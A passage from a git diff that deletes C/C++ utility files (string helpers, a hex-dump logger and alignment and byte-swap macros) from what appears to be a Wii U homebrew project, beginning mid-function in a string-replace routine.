- int len_rep; // length of rep (the string to remove) - int len_with; // length of with (the string to replace rep with) - int len_front; // distance between rep and end of last rep - int count; // number of replacements - - // sanity checks and initialization - if (!orig || !rep) - return NULL; - len_rep = strlen(rep); - if (len_rep == 0) - return NULL; // empty rep causes infinite loop during count - if (!with) - with = ""; - len_with = strlen(with); - - // count the number of replacements needed - ins = orig; - for (count = 0; tmp = strstr(ins, rep); ++count) { - ins = tmp + len_rep; - } - - tmp = result = (char *) malloc(strlen(orig) + (len_with - len_rep) * count + 1); - - if (!result) - return NULL; - - // first time through the loop, all the variable are set correctly - // from here on, - // tmp points to the end of the result string - // ins points to the next occurrence of rep in orig - // orig points to the remainder of orig after "end of rep" - while (count--) { - ins = strstr(orig, rep); - len_front = ins - orig; - tmp = strncpy(tmp, orig, len_front) + len_front; - tmp = strcpy(tmp, with) + len_with; - orig += len_front + len_rep; // move to next "end of rep" - } - strcpy(tmp, orig); - return result; -} diff --git a/source/utils/StringTools.h b/source/utils/StringTools.h deleted file mode 100644 index 851aa73..0000000 --- a/source/utils/StringTools.h +++ /dev/null @@ -1,65 +0,0 @@ -/*************************************************************************** - * Copyright (C) 2010 - * by Dimok - * - * This software is provided 'as-is', without any express or implied - * warranty. In no event will the authors be held liable for any - * damages arising from the use of this software. - * - * Permission is granted to anyone to use this software for any - * purpose, including commercial applications, and to alter it and - * redistribute it freely, subject to the following restrictions: - * - * 1. The origin of this software must not be misrepresented; you - * must not claim that you wrote the original software. If you use - * this software in a product, an acknowledgment in the product - * documentation would be appreciated but is not required. - * - * 2. Altered source versions must be plainly marked as such, and - * must not be misrepresented as being the original software. - * - * 3. This notice may not be removed or altered from any source - * distribution. - * - * for WiiXplorer 2010 - ***************************************************************************/ -#ifndef __STRING_TOOLS_H -#define __STRING_TOOLS_H - -#include -#include -#include - -class StringTools { -public: - static BOOL EndsWith(const std::string &a, const std::string &b); - - static const char *byte_to_binary(int32_t x); - - static std::string removeCharFromString(std::string &input, char toBeRemoved); - - static const char *fmt(const char *format, ...); - - static const wchar_t *wfmt(const char *format, ...); - - static int32_t strprintf(std::string &str, const char *format, ...); - - static std::string strfmt(const char *format, ...); - - static BOOL char2wchar_t(const char *src, wchar_t *dest); - - static int32_t strtokcmp(const char *string, const char *compare, const char *separator); - - static int32_t strextcmp(const char *string, const char *extension, char seperator); - - static char *str_replace(char *orig, char *rep, char *with); - - static const char *FullpathToFilename(const char *path); - - static void RemoveDoubleSlashs(std::string &str); - - static std::vector stringSplit(const std::string &value, const std::string &splitter); -}; - -#endif /* __STRING_TOOLS_H */ - diff --git a/source/utils/utils.c b/source/utils/utils.c deleted file mode 100644 index 0bd7516..0000000 --- a/source/utils/utils.c +++ /dev/null @@ -1,41 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include "utils/logger.h" - -// https://gist.github.com/ccbrown/9722406 -void dumpHex(const void *data, size_t size) { - char ascii[17]; - size_t i, j; - ascii[16] = '\0'; - WHBLogPrintf("0x%08X (0x0000): ", data); - for (i = 0; i < size; ++i) { - WHBLogWritef("%02X ", ((unsigned char *) data)[i]); - if (((unsigned char *) data)[i] >= ' ' && ((unsigned char *) data)[i] <= '~') { - ascii[i % 16] = ((unsigned char *) data)[i]; - } else { - ascii[i % 16] = '.'; - } - if ((i + 1) % 8 == 0 || i + 1 == size) { - WHBLogWritef(" "); - if ((i + 1) % 16 == 0) { - WHBLogWritef("| %s \n", ascii); - if (i + 1 < size) { - DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1, i + 1); - } - } else if (i + 1 == size) { - ascii[(i + 1) % 16] = '\0'; - if ((i + 1) % 16 <= 8) { - WHBLogWritef(" "); - } - for (j = (i + 1) % 16; j < 16; ++j) { - WHBLogWritef(" "); - } - WHBLogWritef("| %s \n", ascii); - } - } - } -} diff --git a/source/utils/utils.h b/source/utils/utils.h deleted file mode 100644 index a502522..0000000 --- a/source/utils/utils.h +++ /dev/null @@ -1,40 +0,0 @@ -#ifndef __UTILS_H_ -#define __UTILS_H_ - -#include - -#ifdef __cplusplus -extern "C" { -#endif - -#define LIMIT(x, min, max) \ - ({ \ - typeof( x ) _x = x; \ - typeof( min ) _min = min; \ - typeof( max ) _max = max; \ - ( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \ -}) - -#define DegToRad(a) ( (a) * 0.01745329252f ) -#define RadToDeg(a) ( (a) * 57.29577951f ) - -#define ALIGN4(x) (((x) + 3) & ~3) -#define ALIGN32(x) (((x) + 31) & ~31) - -// those work only in powers of 2 -#define ROUNDDOWN(val, align) ((val) & ~(align-1)) -#define ROUNDUP(val, align) ROUNDDOWN(((val) + (align-1)), align) - - -#define le16(i) ((((uint16_t) ((i) & 0xFF)) << 8) | ((uint16_t) (((i) & 0xFF00) >> 8))) -#define le32(i) ((((uint32_t)le16((i) & 0xFFFF)) << 16) | ((uint32_t)le16(((i) & 0xFFFF0000) >> 16))) -#define le64(i) ((((uint64_t)le32((i) & 0xFFFFFFFFLL)) << 32) | ((uint64_t)le32(((i) & 0xFFFFFFFF00000000LL) >> 32))) - -//Needs to have log_init() called beforehand. -void dumpHex(const void *data, size_t size); - -#ifdef __cplusplus -} -#endif - -#endif // __UTILS_H_